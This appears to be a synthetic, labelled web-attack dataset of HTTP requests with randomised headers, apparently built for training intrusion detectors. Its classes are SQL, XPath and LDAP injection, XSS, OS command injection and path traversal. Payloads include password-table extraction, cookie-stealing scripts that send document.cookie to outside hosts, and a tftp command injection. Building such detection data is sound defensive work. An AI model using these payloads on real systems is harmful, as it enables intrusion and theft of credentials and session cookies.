Content-Location: http://www.7tbfhe.com/f9mhta/wiyD/rainp/txaa/yxeIfmd.mspx
Content-MD5: YTI2bnVvaWZJY2FocXB1bQ==
Content-Type: application/x-www-form-urlencoded
Host: www.Bedwd2g.biz
Connection: 1reHtnl
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: aje3e)(&(objectClass   =    0ueo*)
Accept-Language: *
Cache-Control: max-age=5
Cookie: 2shhnfdhcE=tstokt
Cookie2: $Version="735"
Date: Mon, 01 May 06 12:04:54 UTC
Expect: iohean
If-Modified-Since: Thu, 03 Jun 04 16:38:39 GMT
If-None-Match: *
If-Range: Thu, 07 Jul 05 02:18:58 CET
Max-Forwards: 2869
Referer: /nissaq/ryfns/trn7kt.mspx
TE: gzip;q=0.6,deflate,trailers
User-Agent: 9Udrnct12 (hKKRQSVP; neqU9b)
UA-Color: color32
UA-Pixels: 5841x328
Via: FTP/8.6 www.tXai15h.html
Transfer-Encoding: compress
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 567 124.96.152.130:6746 "eurcdoMnES" 
X-Forwarded-For: 19.167.50.215
~~~~~: ~~~~~~~~~~~~~~

tci6Ts=aAd&vjjsaef=elsL&sgeN=rtfjorplaNr

End - Id: 39023
Start - Id: 42376
class: SqlInjection
GET /90@P/eOCdzRns.css?Sdeval.Ovak=AND+ascii%28lower%28substring%28%28SELECT+TOP+++1+++++AmIG+++FROM+++++sysobject++++WHERE++xtype+++++%3D+%27U%27%29%2C1%2C1%29%29%29++++%3E++++111&lrgoefn=co&s2childTta=l4xq&lm=peEnqoeah1iszLO&8mhrp8ek=lno8dM2Or8aaaol&iri8bapjE=rgas1sheonmneiriav&uhpnjet8hEnmw2=aacZr&5udy=tUNF-tWXxf.p&@htaccesrv154MRK=nrsa&tgb=992438749&aghdon=trelfep&hhXltatuiAu0wg=a%40r&Nbt=iframe%28 HTTP/1.1
Host: www.9awu.org
Connection: close
Accept: image/gif
Accept-Charset: cp-936;q=0.8, utf-7;q=0.2, iso-8859-5;q=0.4, cp-950;q=0.7, iso-8859-5
Accept-Encoding: 
Accept-Language: aedb-sane;q=0.0, oe-uun;q=0.2, O-oZta
Cache-Control: no-transform
Client-ip: 237.97.207.139
Date: Thu, 08 Sep 05 11:19:54 GMT
Expect: eADhme=nguao17
If-Unmodified-Since: Wed, 26 Nov 08 20:53:32 CET
If-None-Match: *
Max-Forwards: 916
Referer: http://www.nsueo9ta.fr/sn4hhyae/ssoI/joitsG/la6n.txt
Trailer: Cache-Control
User-Agent: Mozilla/8.7 (compatible; Konqueror/4.0; Solaris; iReea; cohrar)
Warning: 305 107.162.173.32 "qpsdina83o" "Fri, 17 Nov 06 24:21:49 CET"

null

End - Id: 42376
Start - Id: 49836
class: XPathInjection
GET /uecU7e4/3z1DbWAwvewkV/zprocessing-instructionv/kdQ.cgi?9im=2768+++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++9766%3D&GcDentah=cAybtCj5Yb-&oaimetoo2a=695293553&1ccDaineio=kihl&vRoh=7329 HTTP/1.1
Host: www.o2lnttq.gov
Connection: close
Accept: audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.6, compress, deflate, deflate;q=0.4
Accept-Language: e-e, t30t-fclrbr, o-Rdev;q=0.4, hSnnfd-gi6tn;q=0.7
Cache-Control: no-cache
Client-ip: 77.69.248.51
Cookie: IeN6iA.openkt=055763;awiaon6silnRaO=22
Cookie2: $Version="7"
Date: Tue, 27 Oct 09 07:45:50 GMT
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: sgt9Obf=4tdadt
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sat, 16 Dec 06 07:30:04 GMT
If-Unmodified-Since: Sat, 02 Dec 06 21:21:14 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Nov 06 06:35:22 CET
Max-Forwards: 80
MIME-Version: 4.3
Pragma: kiatrne='Ri'
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Basic bW5yb25uNzplT2VkdGg=
Range: -16,498057-,69-3
Referer: http://eoAsr.com/pevogB/ttldAds8/mtwne/hhI75El/stscYn9.swf
TE: trailers,deflate;q=0.2
Trailer: Accept
User-Agent: Mozilla/2.2 (X11; U; Solaris 6.1; eo-ew; rv:5.1.9) Gecko/05273755
UA-CPU: Sparc
UA-Disp: 242,752,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/2.8 www.rto5.gif, 7.3 www.emomcuu.jpg
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 245 www.ameroeqh.js "imm4hes1ae" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49836
Start - Id: 48838
class: XPathInjection
GET /heze0oba/uxb.Fo/IOUX/s1jN5Yv4ey1V/aIeQl.VVuIUxxxc/5UQcHGHnra33rgi/nWtoeCyjV1/8F.2jYwnodebinPsJT1E/cE3ZsdIx8/9TIFLP6u/5lter8owtdt8sD7d/tweiexee7emooh5rn.shtml?mrn=%28i++++%3C++count%28Hhls7d%2Fchild%3A%3Atext%28%29%29++and++j+++++%3C+++++count%28hfdoiu%2Fchild%3A%3Acomment%28%29%29+++++and++++k+++++%3C++++count%28ia%2Fchild%3A%3A*%29+%29&1sl9b=tr&objectyDnEO5=tr HTTP/1.0
Host: 40.13.89.216
Connection: close
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: ky-sg;q=0.0, zergrbw-t
Cache-Control: no-cache
Client-ip: 232.170.36.208
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="8"
Date: Wed, 29 Sep 04 20:13:19 GMT
ETag: W/"avJZH_WOE6_-E78DqOa"
Expect: 100-continue
From: ehltm@dertmLeUhi.com
If-Modified-Since: Thu, 08 Apr 04 17:47:07 CET
If-Unmodified-Since: Wed, 11 Mar 09 14:52:48 CET
If-Match: *
If-None-Match: "MrwIIj4t5uVwxU8o"
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 251
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: iuut ieiRnfr=Svncz
Range: 082566-8,-28,28-06636
Referer: /3iethY.exe
TE: trailers,gzip;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/9.3 (Machintosh; U; Mac OS X 0.4; co-ha; rv:0.5.4) Gecko/21987604
UA-CPU: StrongARM
UA-Disp: 5906,9544,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 2.1 www.vsovh5.shtml:1660, FTP/8.5 www.fmEet.js
Transfer-Encoding: gzip
Upgrade: qdiue/5.0
Warning: 633 188.14.137.244 "aosw5Aneiu" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48838
Start - Id: 35169
class: SqlInjection
GET /tlFpDouY/uAV.iH7@zZPXMpG7gipo/nvDNye3wAoL5dD/aKOEk/ahkdnai11r/IfE/.Od@rAv/L-nGnu9RpT/i5Fyc7gbdT4TMdPg0-/fethn2htrieaseieeetn/9ttg@A70lW.sh?oa=mtn&edami=d3b3n8.z.Z&rlxpuzentehu6o=3439747&ECm9mhsmtr=10246670&71mh108cseEaii=908&vTtYcw03C=%27+%2F**%2F++++OR+%2F**%2F+%27uesr2unhr%27+++++%3E+++%27S HTTP/1.1
Host: 83.73.67.90
Connection: Dhnl
Accept: text/html;q=0.7
Accept-Charset: *
Accept-Encoding: deflate;q=0.6
Accept-Language: tltosin-7amsenn;q=0.7, dni-oiea;q=0.8, ns4era-eu, mNwsado-idas;q=0.9
Cache-Control: no-transform
Client-ip: 86.6.34.68
Cookie: bhatTchgtrryedM=ax4eqesr9Rw;Km6KoQJ=esLilyDect;eTkm72hrs=82118
Cookie2: $Version="07"
Date: Sun, 28 Jan 07 03:35:21 GMT
ETag: "yVk20OLqWyt55fRiFtBZ"
If-Modified-Since: Thu, 22 Jul 04 16:44:03 CET
If-Unmodified-Since: Sun, 23 Oct 05 06:11:38 UTC
If-Match: *
If-None-Match: "SJ28lZWDEPCGxgyvayc@"
If-Range: *
Max-Forwards: 769
Proxy-Authorization: NTLM bWM1dG80b0x0MjBzYWFzaXVmZXRzczlyM211NG5yaHR2YjNtbW5zY25sZTlsNWZv
Range: 97412-
Referer: /rtegi9/qtfa.pdf
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/9.1 (X11; U; Open BSD i386 5.2; 9h-ib; rv:9.8.9) Gecko/64239693
UA-Disp: 1579,9873,8
Via: FTP/4.5 www.eaee9eNc.png, 1.4 101.62.77.40
Transfer-Encoding: ndteU
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
----: ---------------

null

End - Id: 35169
Start - Id: 42609
class: SqlInjection
GET /1y./s458eisrt/tgsSvfCJlJouV/.1CV/7tnnoy9iDcouweHA/C5autoexecF./toGtQSx@KOxb/9rr_c0YiyvU@tSX7Xo/JI7-DhoLfKdrop/7nsmt0epah/0aONDd-c@T6bgsound.swf?n0oaeeta8eE1seo=108&4ccneltjqned8=3r-EKCbM&vdeleteWpvXoi-=or+++0%3C%3E%28select++count%28*%29++++from+id4sQi1c%29&eyK6J1updateV9Aj=eH6n2s0AiHien&hqze9ncBgroup bysS=h2PUKO&nsusiNediqr0rn=ulsnltih&rt=Ewk3aaeic&ntc23wea=sULFRaNiZB&61ireval7=vlB.%40zCp HTTP/1.0
Host: 227.123.110.79
Connection: keep-alive
Accept: application/x-tar;q=0.5, audio/x-wav;q=0.7, image/*;q=0.9
Accept-Charset: cp-950, iso-8859-8
Accept-Encoding: *;q=0.1
Accept-Language: lqn-ch
Cache-Control: max-age=8
Client-ip: 133.203.70.198
Cookie: ayqi0m=a3~ d;1qrn=rvZarj3vkgG
Cookie2: $Version="901"
Date: Fri, 23 May 08 17:07:00 CET
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: Ttm5ttN@Sin1.net
If-Modified-Since: Tue, 23 Mar 04 21:40:43 UTC
If-Unmodified-Since: Sat, 15 Nov 08 17:36:07 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 03:46:25 UTC
Max-Forwards: 158
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: kIy2iv dgso3rtl=ecuz
Referer: http://au1lLiEo.st/rdTulfsC/e5ra/mnlnnlu.jsp
TE: gzip;q=0.0,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 5.7; hh-Lb; rv:6.6.5) Gecko/54196964
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: wm5nt/6.8 254.58.248.24:889
Transfer-Encoding: compress
Upgrade: utiuG/5.0
Warning: 966 www.behrc.jpeg "tmzezat" "Sat, 08 Apr 06 03:40:35 CET"
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42609
Start - Id: 38789
class: LdapInjection
GET /HYpsWUZeNowzNN/ueSW.html?7i8Nee=aothjoeooso1ruc&OmWexjao=73&f5ldn=6&gemispwni=097&cBexecFdfromlRLwAc=%29+%28++%7C%28displayName%3Dhad*%29+%28name++%3D++had*+++%29%28++++mail%3Dhad*%29 HTTP/1.1
Host: 180.157.130.74
Connection: close
Accept: */*;q=0.3
Accept-Charset: utf-8;q=0.9, windows-1255, macintosh;q=0.8
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 239.52.8.232
Cookie: rto=axtr;mochaechoi.N9y-0perlH=iatPtDp/;1zp7=4w8a6s;Jsock_stream7@EjNlibx1inputz=75234754;ilIllobGlHbN=<OeNo>hlPnodeetcberO6;IAGweE_g7r=elwp-atEiupdateh
Cookie2: $Version="919"
Date: Sat, 13 Dec 08 15:34:23 CET
ETag: "IBtj26H_ux12tRgi"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Fri, 22 Jun 07 01:49:58 UTC
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: "3EeGn0v@AGmvffRBOKRc"
If-Range: *
Max-Forwards: 57
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: NTLM dHFUbHRhaGVlY2l4YXJPZWFobnNhYnNhUnJ0OWV0aGRtb3JzZW52aEVmQ2Nv
Range: 777808-9828,-9730,-076
Referer: /n9dWe.shtml
TE: deflate;q=0.5,trailers,trailers
Trailer: Upgrade
User-Agent: 8rkabfeaq/1.9.0
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: FTP/7.0 32.102.43.60
Transfer-Encoding: btgba; saiEh=rtnei
Upgrade: cjw/0.8, roll/0.1, tytuee/5.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38789
Start - Id: 41448
class: SqlInjection
PUT /qJiAb0Dq59/2erfas8traysktnF/soe/3MAOycEuj9zGUZ/n.ZTJEiG2ws.mdb? HTTP/1.1
Content-Length: 176
Content-Language: edtbTs
Content-Encoding: deflate
Content-Location: /fnzvali/seSspz/rqsjc9/kcatwwd/d0ro.png
Content-MD5: RGFSNmEwNm5hRW1lMWNlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Oct 09 17:39:24 UTC
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: 246.125.111.90:3470
Connection: iscn
Accept: application/zip, image/jpeg
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.6, gzip;q=0.2
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 147.60.52.85
Cookie: lT=m2R
Cookie2: $Version="9"
Date: Thu, 06 Nov 08 02:46:41 UTC
ETag: W/"0T-9MndUn8_eYiCf9G8s"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Sat, 19 Nov 05 24:53:29 CET
If-Unmodified-Since: Sun, 04 Jan 04 17:26:10 GMT
If-Match: *
If-None-Match: "a_YCkpd2EOy2bNf8ohzt"
If-Range: "dfAkBc5BPKkPXjMlYg"
Max-Forwards: 65
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: DOta oenSzuon=hsmcy
Range: 8443-378,0047-
Referer: http://www.1fn3pIr.com/nrdteh/ayqjviw/nm8Egw/ruincsf/aaib.nsf
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/5.8 (compatible; meshsmy3Ta; Mac OS X; mnIt; nerEtnaeK; ltelr)
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 738x118
Via: uTLL/1.4 www.eoasa.htm
Transfer-Encoding: gzip
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 671 145.233.120.251 "tiua3dtweorond5gt" 
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

4ou9fwemCtemE=hivbscriptreje&qMsJch9ZP=195763&1lertoyse9=835526&Zoadx=rui1wrameyv$Cr&tdlu=waeatlGdivmkleodie0a2re&wit4yos='union   select   PASSWORD  from DBA_PASSWORD;--

End - Id: 41448
Start - Id: 48682
class: XPathInjection
PUT /ncs/wvFK9p@/cmmnsn0ew/rcaeil6eelctn/eAP-C/RleyL/oet6otlmthmwDo6lh/os.gif? HTTP/1.0
Content-Length: 181
Content-Language: lbhhuh
Content-Encoding: gzip
Content-Location: /t3An.mpg
Content-MD5: MG4zTW1va2c2bGNhaWVhbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Last-Modified: Sat, 14 Aug 04 20:35:01 CET
Host: www.dandBzt4e.it
Connection: ittumnuo
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aao-sNp, A-gitwy;q=0.6, oVd-invcoay;q=0.6, ct1-aEru7t
Cache-Control: min-fresh=6
Cookie: N2a=959;tieNrlk=4
Date: Sun, 09 Apr 06 21:44:11 GMT
If-Unmodified-Since: Wed, 13 Aug 08 17:32:31 GMT
Max-Forwards: 67
Pragma: no-cache
Referer: http://www.nollmen.gov/eulcvs6/oeleg/neRd/iolq/kslaerad.js
User-Agent: ethb/3.1
UA-Color: color16
UA-Pixels: 640x9904
Via: 9.0 www.nEv2aeS.jpg
Transfer-Encoding: deflate

l3nsEtasO0gi=70   or  ee1e5/nai/si5sno/child::node()[position()=47] or   9=&ivreosehNoiXo8=teTfar&uc=w-b6ahQ2&4gartecf=q t-Aeais&nlTsio=between&X3Q3u2=tye 

End - Id: 48682
Start - Id: 42347
class: SqlInjection
GET /NtgsgnarsfsoniocB/7T9gl.xD2bpVRR/ef199aO/u9C5RHI5ygN.sh?tfinAxiesfu=6++or+id%3E8++++or++ls_id%3C3640 HTTP/1.1
Host: 12.113.228.199
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: koi8, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: aOoago-sbsbiaB
Cache-Control: only-if-cached
Client-ip: 106.173.49.114
Cookie: iikaiyol8=ouye;EaVtw6rryn= qbe
Cookie2: $Version="85"
Date: Sat, 04 Sep 04 19:50:59 CET
ETag: "OVVBmY_Rb3C9MGri_gO"
Expect: hoioeia=Artttt;msuR6sft=Rec7diI
From: 9quNt@ct6Iewpcw4.cz
If-Modified-Since: Fri, 05 Mar 10 22:38:05 UTC
If-Unmodified-Since: Thu, 05 Oct 06 02:05:10 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jul 08 24:27:17 UTC
Max-Forwards: 763
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic aGlzbGlvZTpyRVU0c3IwMQ==
Authorization: Basic cXJlcjp3czBzYw==
Range: -42018,-510767
Referer: http://www.rileit.st/IvfCext/aTpnef.shtml
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.1 (compatible; MSIE 9.1; WinNT; itT1)
UA-CPU: PowerPC
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: 2.1 www.edhi2y.css
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42347
Start - Id: 46744
class: XSS
GET /0SwB28OfQ/imbmneuxw2nnin/fQOW7JR/l1O1/-z8eNMgJBHdn/rw/oXN0LXzvpGGDAynvRh/uebd0mpgii.js?ewtiea3jia6s=EeecZtiiiafdgej&hhori=ijvcrsrfiu+sh&4ttngbdt0=Tmeinputed+j9MonWtrcpE%5C%26khttp&lruphe3dg=953532 HTTP/1.0
Host: www.hit3n.cz:0
Connection: iaea9d
Accept: audio/*, video/*, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: Ov-oE0feelt, aA-etiet6l
Cache-Control: only-if-cached
Client-ip: 19.58.155.14
Cookie: oospataygiavich=hdpei5eh;rnceeeu=<input   type   =   "image  " dynsrc  =   "  javascript:[window.open('http://14.68.15.154/ar.dll'+document.cookie);]    ">;rueso=&=/e0tt'3[e8cn7t;e1dny=a%ah)gcsr
Cookie2: $Version="46"
Date: Sat, 20 Nov 04 02:16:36 CET
ETag: "xiubSN87eRtmmb1OGP7"
Expect: 100-continue
From: scasu@Elrtai.net
If-Modified-Since: Sun, 12 Mar 06 01:37:13 GMT
If-Unmodified-Since: Thu, 30 Jul 09 17:02:34 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 94
Pragma: caast=NEm3tn
Proxy-Authorization: psatf diliexbX=thhwo4s
Authorization: NTLM ZXRvZWVibHluaU84aXRuaW1pZnNjZWRhZWhod2llSWF5aG1Ucm8=
Referer: http://www.wcsa.biz/wimtvnt/lnn1e/e663/2Anreko/uphb5sx.jpeg
TE: trailers,chunked
User-Agent: Mozilla/4.7 (Windows; U; Win98 1.0; ax-du; rv:4.4.7) Gecko/12860320
Via: 7.8 www.istwL.gif:31333, FTP/4.8 www.teiosl.css:44939
Transfer-Encoding: identity
Warning: 305 www.me7rIe.js "dee5aniAheserk9leoct" 
X-Forwarded-For: 54.166.146.233
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46744
Start - Id: 44581
class: OsCommanding
GET /reesglQ4ktfsch3nnd8/ifpsVa-htaccesgc9BZ/mHDSt_BMivTU/iist.html?Od4Ntot8arhhwh=2.218.142.18++%3B++tftp+192.168.10.33+test.txt&ta0edeqansgjiOe=aA7ne67beirzhsa0zt&atReghihs=7&ahfltesH=isIYp&6lnspt=t%25&torvmaoanorfos=ge%2B&xe=xrC2iehsh&to9feskw=4372683&ecemhmkoahwais=pdKueJ4oNP&tesGoetnwoZ=6&ec50=qqeoobtoswcc&dGoht9s=762794&cllS0haswa6r=%3Bme&etie=e+t HTTP/1.1
Host: www.erreea.com
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8, hz-gb-2312
Accept-Encoding: identity;q=0.8, gzip;q=0.5, gzip, deflate;q=0.5, identity;q=0.1
Accept-Language: IazwA-s8dmetae;q=0.6
Cache-Control: max-stale
Client-ip: 2.90.133.61
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Fri, 02 Mar 07 14:28:32 GMT
ETag: W/"wGdDKS5AiuXyrtwMN2s"
Expect: 100-continue
From: 5adpe@rmshynj.net
If-Modified-Since: Thu, 15 Oct 09 07:21:50 CET
If-Unmodified-Since: Wed, 23 Apr 08 17:01:04 UTC
If-Match: "AKSK2K67PW_WvHrme"
If-None-Match: "hOItKIdkiYPa2EpC-B1f"
If-Range: "-x@gyRuBYqkDCwoP"
Max-Forwards: 53
MIME-Version: 0.9
Pragma: reqiA='h'
Proxy-Authorization: Basic YXNkdUdTOnVzZTcz
Authorization: NTLM a2J1cmgzMWhpZW9ubm55aGlCZ2xuZWluanJzQm9zZW5SYXNpYWlwNWVMczBu
Range: 746-,-10102
Referer: http://www.eSrdcdc.fr/ooUotot/hta1a/doia.mdb
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: yejm/1.0.3.6
Via: 1.6 189.17.89.88
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44581
Start - Id: 48708
class: XPathInjection
PUT /rOCxNQL/HN/jutbshp/rGv/rsNDOUHxcKZBK_3cdc.a/21GbinQ/ojen/afpuV9m_gQQ2yLcdgn/Niaccess_logBQ1NA5k.nsf? HTTP/1.1
Content-Length: 187
Content-Language: yb
Content-Encoding: identity
Content-Location: http://www.teeiz.com/f47tgnsa.aspx
Content-Type: application/x-www-form-urlencoded
Host: www.uc1n8aS.be
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: gzip;q=0.2
Cache-Control: max-age=13
Cookie2: $Version="63"
Date: Sat, 29 Sep 07 06:18:54 CET
From: 0Czsri@otpu.uk
Max-Forwards: 6753
Pragma: no-cache
Range: -4,59993-18,28-7301
Referer: /emHdsei/n8sI6e1.asmx
User-Agent: Mozilla/4.6 (Windows; U; Win98 2.6; ca-ur; rv:2.7.8) Gecko/39401707
Upgrade: aer/1.4, ieE/6.5, hbq/3.1
X-Serial-Number: 586508390592927979

lnenaeftdLrB=Aei/s7m/heryer/child::node()[    position()=0] |     ereoaB/eis3w/rE3/child::text()[position()=235]     or   'si'= '

End - Id: 48708
Start - Id: 47858
class: XSS
GET /openhhoejprciju/6metcshutdownautoexecdQ/jalr8Nmt/4Ka1vemYpTY3IRWkgn/E3O51fHiM12FLc/l3tmghkdabemhCeN1/ptnat6nGren0e/gJv/entMhineensiacu/meh4atwLirtte.sh?n2ssteo7Rtuhlur=passwdeeraoeitnx%3BIh9orlocationid&oTa7snihrctd5vh=1142816319&a6tnnsane2ksta=s%5CtrtOWn&ahnweyateba6c=Tta&tnhwnq3sEe=eQaRI&rd=sg3divl&nh9ng1plku=tGia&tHhiricauag=8&yt=t5esn5awjo%3Dyl&shpze4j=756891&Dvns=script&ndoqraeArf0s=%3Cmeta+http-equiv++%3D++%22++refresh++++%22++content+%3D+++%22+++++0%3Burl%3Djavascript%3A++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.re.com%2Fcgi-bin%2Fnsng.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+%3E&u64=z2a2%7CMeiStxf HTTP/1.1
Host: www.9Tin.org:26586
Connection: close
Accept: application/rtf;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: cn-c22rn;q=0.1, Dtoii-e;q=0.5
Cache-Control: no-cache
Client-ip: 237.181.40.228
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="7"
Date: Tue, 18 Nov 08 05:04:38 CET
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: 5uawbe5@Rlotbsnho.net
If-Modified-Since: Mon, 13 Oct 08 19:18:02 UTC
If-Unmodified-Since: Wed, 10 Aug 05 18:50:52 CET
If-Match: "s52Zv4L01-S3.8qO2C2"
If-None-Match: *
If-Range: Fri, 20 Jul 07 05:27:58 CET
Max-Forwards: 640
MIME-Version: 9.4
Pragma: Eo4o='uiChtr'
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: Digest opaque="dafoil"
Range: 595606-7,222673-07
Referer: http://aesEe.ch/mMae/gUeil/7vegw/taagus1.gz
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.0 (X11; U; Solaris 6.8; s6-8m; rv:6.6.3) Gecko/12609573
UA-CPU: x86
UA-Disp: 4309,162,32
UA-Pixels: 3411x5439
Via: 0.1 www.t0twn.htm:049
Transfer-Encoding: compress
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 420 163.148.232.91 "lraIhepmpe4o3l" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47858
Start - Id: 37489
class: LdapInjection
GET /s_dpW9o_iC/cxJo/ahlo/1dstpg/RekrfsgeeEdrsoooh/DlzOYKCETN/tHsVdnoo3o1oisunRes/cet7uxsh/cgi/a1siqMasehaaheea/zLQurcC2-QrRqHWeXnbm.gif?ogMldselonel4q=4wSaANzcaF HTTP/1.0
Host: www.vath.biz:02
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932;q=0.3, iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 89.147.112.207
Cookie: ehaedutzu0eeWIa=gotd)(   |  (sd=*)
Cookie2: $Version="28"
Date: Mon, 30 May 05 12:23:37 GMT
ETag: "U.WYXEjP6IvruVqLzm@"
Expect: 100-continue
If-Modified-Since: Sun, 08 Aug 04 03:34:35 CET
If-Unmodified-Since: Fri, 25 Sep 09 05:24:00 CET
If-Match: *
If-None-Match: "-1OoHmsppxp1G-2q"
If-Range: Thu, 02 Nov 06 13:16:33 UTC
Max-Forwards: 0421
MIME-Version: 0.8
Pragma: Rne=ie
Authorization: giss stsmTo=g8Vptlr
Range: -15680,16-,44-
Referer: /mclli.jpeg
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: Mozilla/5.3 (compatible; MSIE 4.5; Win98; 0dupyea)
UA-CPU: 68000
Via: nlaaRT/2.9 www.heote.jpeg
Transfer-Encoding: identity
Upgrade: el802n/2.8, orur/1.2, eyTiS/2.5, ar3ys/6.2
X-Forwarded-For: 164.15.82.135
X-Serial-Number: 665967070
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37489
Start - Id: 45777
class: PathTransversal
GET /nbV/DJ.css?sZeAYot2seStgo=Xo7tsgse51&msitqenuqrzeep=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fleolilat%2Felarngveet%2Fesitst%2Falni.sh&fb2STOQQC=objectli&ay6pm3e=+egsEt&WdgN@FSs7Ip=%7Cc%24%271&Bro3A=nwariI51ei&7VnjII8G=408&pFhl=esxa HTTP/1.1
Host: 64.25.52.233
